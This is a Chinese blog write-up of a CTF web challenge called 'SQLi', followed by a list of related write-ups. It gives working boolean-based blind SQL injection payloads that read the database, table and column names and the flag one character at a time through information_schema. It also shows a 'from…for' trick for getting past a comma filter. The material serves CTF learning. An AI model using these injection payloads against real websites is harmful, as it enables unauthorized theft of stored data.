“百度杯”CTF比赛 九月场 SQLi 解题思路

最新推荐文章于 2023-08-24 21:02:26 发布
最新推荐文章于 2023-08-24 21:02:26 发布
阅读量1k 收藏 1
点赞数
分类专栏: 信息安全 文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hacker234/article/details/102571745
版权

题目简介

题目名称:SQLi
题目内容:后台有获取flag的线索

解题思路

  1. 打开地址使用burp抓包发现“l0gin.php?id=1”。

在这里插入图片描述

  1. 打开“l0gin.php?id=1”地址

使用1’ and ‘1’=‘1(成功)和1’ and ‘1’='2(不成功),说明此处存在sql注入。测试中发现后台过滤了逗号,在这里使用from for代替逗号。

开始注入

  • 猜测数据库名称
    猜测数据库名称的长度。代码:id=1' and (select length(database()))='4
    爆破数据库名称,按位猜测每一位的字符。代码:substring((select database()) from 1 for 1)='q
    这一步得出数据的名称“sqli”。

  • 猜测表名称
    猜测表名的长度。代码:(select length(group_concat(table_name)) from information_schema.tables where table_schema='sqli')='5
    爆破表名,按位猜测每一位的字符。代码:substring((select group_concat(table_name) from information_schema.tables where table_schema='sqli') from 1 for 1)='f
    这一步得出表的名称“users”。

  • 猜测列名称

    猜测列名测长度。代码:(select length(group_concat(column_name)) from information_schema.columns where table_name='users')='29
    爆破列名,按位猜测每一位的字符。代码:substring((select group_concat(column_name) from information_schema.columns where table_name='users') from 1 for 1)='f
    这一步得出列名“flag_9c861b688330”。

  • 猜测值

    猜测值得长度。代码:(select length(group_concat(flag_9c861b688330)) from users)='47
    爆破值,按位猜测每一位的字符。代码:substring((select group_concat(flag_9c861b688330) from users) from 1 for 1)='1
    这一步得出列中的值。

Gond19
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
工匠杯-CTF(题目+exp+解题思路
04-01
CTF竞赛模式具体分为以下三类: 一、解题模式(Jeopardy) 在解题模式CTF赛制中,参赛队伍可以通过互联网或者现场网络参与,这种模式的CTF竞赛与ACM编程...资源包括工匠杯比赛的三道题目和exp,并详细写出了解题思路
[NCTF2019]SQLi --BUUCTF --详解
金 帛的博客
06-13 1250
BUUCTF记录贴
“百度杯”CTF比赛 九月场 类型:Web 题目名称:SQLi ---不需要逗号的注入技巧
wkend的博客
05-09 3821
今天在i春秋做题的时候遇到了移到非常好的题目,于是在参考了wp的基础上自己复现了一遍,算作一种技巧的学习与收藏吧。 题目i春秋连接:https://www.ichunqiu.com/battalion?t=1&r=54791 访问地址,发现什么都没有, 查看页面源代码,发现提示 访问地址 http://69ef94c7ef5e47b580ed5c7bae472bc4c3b...
CTFhub-sqli注入-报错注入
ssss39的博客
08-24 1345
group_concat(目标值)
CTFSqli-Labs题目解析(1-11题)
a690135443的博客
06-14 1257
第一题 提示输入numeric类型的ID作为参数,尝试在url后添加?id=1查看,发现有显示。 改为?id=-1后无显示,也无报错,于是可以考虑-1空出位置后加union select爆数据。 改为?id=1'单引号报错,双引号不报错,可以推断出使用单引号闭合,加上注释之后,错误也消失了,所以可以在这个时候union select了。 然后添加order by语句,?id=1' order by 4 --+,当order by 4的时候报错,所以一共有3个字段。 然后使用unio
i春秋WEB CTF 2
cbhjerry的博客
11-16 2728
题6:SQL,出题人就告诉你这是个注入,有种别走! 解题:这是一个存在sql注入漏洞的题目, 通过手工测试发现程序对"SELECT","ORDER"进行了识别,即判断为注入行为,虽然对"AND"不进行识别,但如果其后面有"="同样认定为注入行为。同时发现了对"<>"进行了过滤,因此可将以上3个关键字换成"SELEC<>T",&quo
“百度杯”CTF比赛 九月场 题目名称:SQLi 后台有获取flag的线索
qq_41168609的博客
07-23 726
“百度杯”CTF比赛 九月场 题目名称:SQLi 后台有获取flag的线索解题思路 解题思路 1. 具有SQL注入点连接: http://c3084761df8c4b1c91ddf64fd8c2ed4f22bb2637d78e4132.changame.ichunqiu.com/l0gin.php?id 2. 逗号之后被截断了,使用无逗号注入mysql无逗号的注入技巧 3. 判断字段个数 (SQL语句出错时,id原样输出) payload: l0gin.php?id=1%27%20order%20by%2
"迎圣诞,拿大奖"赛题——SQLI
Ramona的博客
12-22 655
0x01 本题所需知识清单: 1.php sprintf()函数漏洞:https://blog.csdn.net/WQ_BCJ/article/details/85057447 2.布尔盲注基本playload及流程:https://blog.csdn.net/WQ_BCJ/article/details/84592445 3.Burpsuit  Intruder暴力猜解:https://...
i春秋 “百度杯”CTF比赛 九月SQLi writeup
weixin_43442029的博客
01-12 554
0x00 打开题目链接后是一个空白页面,老规矩,去源代码找线索,于是就发现了提示login.php?id=1。 由题目可以知道这一题是SQL注入有关,那url的参数id应该就是注入点了。不过我试了好几次都没有特殊的回显,后来在网上搜到一些提示说真正的页面是l0gin.php。不得不说出题人和解出来的人脑洞是真的大。(不过之后做了一些其他题目后才发现这次比赛的出题人很喜欢这样的命名方式,可能是这样想...
ctf每日练习-第四天
想变得强大,虽然现在还弱不禁风
09-05 240
今天的内容主要是sqli,好几天没写首先因为这几天刚开学事情比较多,二是因为这几天一直都在学习,刷题反而不是很多,今天和同学去图书馆学了一波,感觉收获很大。 easy_sql(来自攻防世界web进阶区) 题目链接: easy_sql. 首先我们尝试一个单引号,报错 error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the
【SQL注入】CTF练习题WriteUp——“百度杯”CTF比赛 九月场SQL
Fighting_hawk的博客
05-17 3403
1. 本题关键在于关键字的绕过,需要耐心+细心,一个个尝试。 2. 同时在练习过程中多记录累积一些绕过的方法,比如这一道题的。
百度杯CTF比赛二月第三场比赛(Reverse专题赛)的CrackMe-1题目
03-30
百度杯CTF比赛二月第三场比赛(Reverse专题赛)的CrackMe-1题目。
CTF题库解题思路.xls
01-25
CTF题库解题思路
CTF杂项解题思路探究.zip
02-26
CTF杂项解题思路探究.zip
ctf web解题找flag夺旗赛之常用的解题思路及技巧
最新发布
12-29
ctf web解题找flag夺旗赛之常用的解题思路及技巧ctf web解题找flag夺旗赛之常用的解题思路及技巧ctf web解题找flag夺旗赛之常用的解题思路及技巧ctf web解题找flag夺旗赛之常用的解题思路及技巧ctf web解题找flag夺...
“百度杯”CTF比赛 九月SQLI
wyj_1216 House
04-06 291
题目来源 i春秋题库 writeup 1、一开始进去,啥都没有,那就查看页面源代码看看吧 发现了login.php?id=1 2、于是,进入到此页面看看 尝试进行注入,发现,并不是真正的注入点。 3、那就一起来找一下注入点吧 这里有个很坑的地方!!! 存在跳转!!! 具体发现方法,我也是拜读了大佬的博客才发现的 注意看上面两张图片, 发现了隐藏起来的关键点:l0gin.php?id=1 ...
Ctfshow web入门 sqli-labs篇 web517-web568 详细题解 全
Jay17的博客
07-30 886
Ctfshow web入门 sqli-labs篇 web517-web568 详细题解 详细 详细 详细 真的详细
“百度杯”CTF比赛 九月场 SQL-writeup
大方子
07-31 2913
  这题自己的收获:用<>隔开敏感字符,绕过防注入   题目界面: 刚开始还是老规矩输入and 1=1  发现被拦截  此外 测试了or 发现也进行了拦截 我们可以用下面的字符来替换 and 和 or and---->&&    ,     or-----> ||       替换后发现可以成功绕过 接下来进行猜字段长度  发...
渣渣学CTFsqli-lab
weixin_43900310的博客
05-15 626
关于sql注入中的普通注入(对应的sqli-lab中的less 1-5) 1.注入类型: 数字型(直接输入数字便可以注入) 字符型(在less1,less3,less4中,存在形式一般为1’ 1" 1’) 1"))这得看判断得到的结果反馈是什么,从而猜测他的注入形式。 2.注入语句: 对数据库中存在的字段进行排序,注意此处为1’ 让其语句通过 1' order by 3 --+ ...
福建闽盾杯 ctf比赛题目
08-26
福建闽盾杯CTF比赛题目是指“福建”和“闽盾杯”这两个关键词所组成的CTF比赛的题目。CTF(Capture The Flag,夺旗赛)是一种网络安全竞赛,旨在考验选手在网络攻防和信息安全方面的技能。 福建作为一个华南沿海...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值